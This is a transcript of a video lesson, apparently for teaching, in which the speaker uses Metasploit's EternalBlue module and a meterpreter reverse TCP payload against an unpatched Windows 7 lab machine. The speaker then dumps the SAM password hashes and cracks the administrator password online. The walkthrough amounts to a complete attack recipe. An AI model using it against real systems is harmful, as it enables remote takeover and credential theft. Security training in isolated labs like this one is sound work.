Hello, in this lesson I'm going to take you through how to run metasploit in Kali Linux to attack a Windows 7 machine. This time what we're going to do is we're going to use an attack called Eternalblue to access the Windows 7 machine. I have previous videos on how to use this tool, but this time we're going to attack the SAM database, the Security Accounts Management database, to crack the password. So we're going to put the hash key in here, and this is crackstation.net. And then when we crack the hashes, we come back and it'll tell me that the LAN manager, the NTM LAN manager, which is this here, the password for that is capital P at SSW0RD. So it's cracked it fairly quickly. So how did we get to this point? So if I just bring up my virtual machine, so I'm going to bring up my Kali Linux machine, and I'll walk you through this. So the first thing to mention is I am in a sandbox environment, so I have two virtual machines, Kali Linux, Windows 7, and the machines are isolated from the actual real network. So set to internal here. So the two of them are set to internal. I've assured they're pinging first of all, and that I do have a network connection as well. Now on the Windows 7 machine, the firewall is switched off. There is no updates been run on the Windows 7 machine, and there's no antivirus, so it's very vulnerable. If any of these aspects are enabled, then the likelihood is a lot of the attacks will not work, and that's the nature of running antivirus, firewall, and updates, is to secure the system. So, but the Windows 7 machine hasn't had a chance to update. So how did I get to this point? So if I come over here and I scroll up, I'll take you through. So first thing I had to do was run a window, and a terminal window here, this little black icon, and the Metasploit framework loaded up. So the command for that was MSF console. But previous to that, it's probably important to mention that when you shut down Kali Linux or restart it, because it runs in RAM, then if you restart or shut down, you need to set the IP address again, unless you edit the network manager file. So the command to do that is sudo superuserdo ifconfig, and then Ethernet. Because I only have one Ethernet adapter, it's 0. Subsequent ones will be 1, 2, 3. And the IP address and network mask here. Okay. Put the password in, and always check that it did actually set by typing in ifconfig. Remember, in Linux it's ifconfig, and Windows it's ipconfig. And I've checked to see that it did set. The reason for that is because if you typed in the password wrong or made a mistake, then it won't tell you. It will you just assume it worked, and it didn't work. Then ping the other machine, make sure you do have a connection. As I said previously, then launch the Metasploit framework, MSF console, and banner will display. To change that banner, you can just type in banner and it just changes the banner again. See, I've ran it a few times. And the next thing we need to do is set the actual database for holding the vulnerabilities that we can search. So service host GRE SQL start. So we start the database, and then we can search the database. We're going to search for Eternalblue. I've got previous videos on this. We search for what's available there, and it comes back and it'll search for Eternal or Blue or anything like that. And we can see here that we've got, the first one it comes back with is this particular one. Now I can type that in, or I can actually use 0, or what I can do is just copy that selection, and then down here use, and then I could paste that in. So I could paste that, save me typing out this. So I can either put in use 0 or use and type this in, or I could paste it in. But this is the command we're going to use here. So it's use exploit Windows SMB small message blocks used for connection to shares, and MS17010 Eternalblue. And once that's set, it'll come back and say no payload configured. So we need to set, so we've got the vulnerability or the exploit running. We need to set the payload for that. But it says there's no payload configured, so it's defaulting to this particular one here. So that's fine, but we could search for payloads. I'm just going to copy this. I can copy that. I can show payloads, and I can go through all the different payloads for all the different operating systems and services that could be vulnerable. But I'm just going to use that particular default one. And I'll come back down to this particular point here. So the command that we need to put in is set payload, and then I just pasted that command in, but you can actually type it in if you want. So, or set payload Windows x64 meter preter reverse TCP. So we're making a reverse connection to the Windows machine, so we have control over it. So we set the payload, and the next thing to do is set the remote host. This is the target machine. And then set the local host. This is the Kali Linux machine, which is this particular machine. And then we run the exploit. Now it should look like this if it's going to work. If it's a refused or no session connection, then it could be because the Windows machine is secured by an update or antivirus or firewall, or that you don't have a network connection. But this one has worked. I typed in help, and it shows me what I can do with this particular exploit here. And there's a whole lot of things we can actually do. We can kill processes. We can take control of the actual desktop as well. We can actually make directories. There's the mkdir. We can actually remove directories. There's a whole lot of different commands that we can actually do. We could actually send mouse events, keyboard stop and start. We can actually get the desktop, webcam, record the microphone. Whole lot of different things we can actually do, but the one we're going to run today is this particular one here, which is hashdump. Now I've run that command already, hashdump, and fairly quickly it hit the SAM database on the Windows 7 machine and listed all the accounts that are in there. So we can see we've got different accounts. There's Cool Guy, Davey, Guest. Now these first numbers are the actual SIDS security identifiers. And if you see a number 500, then you know it's an admin account. If you see 501, it's a guest account, and these other ones are user accounts. So you can see 1000, then 1001, 1002, and so forth and on, so on. Now, by default, this account is usually disabled within Windows unless it's enabled and set a password. And so I'm going to look at this account where this gives us a clue that it could be an account with administrative rights. Now we can ignore this first bit part that said, and we come back to where these two dots are, and we need this number here. So this is the hash. And we take that hash and go into CrackStation here. Now, because this is my base machine, I just typed this number in, but if you can get bidirectional working in VirtualBox, then you can right click and paste. Typed it in, cracked the hashes, came back with the NT-LAN manager password as being capital P at SSW0RD, and that's that password for that admin account cracked. Okay, so that concludes this particular lesson. Hope it helps, and you can view some of my other videos later on.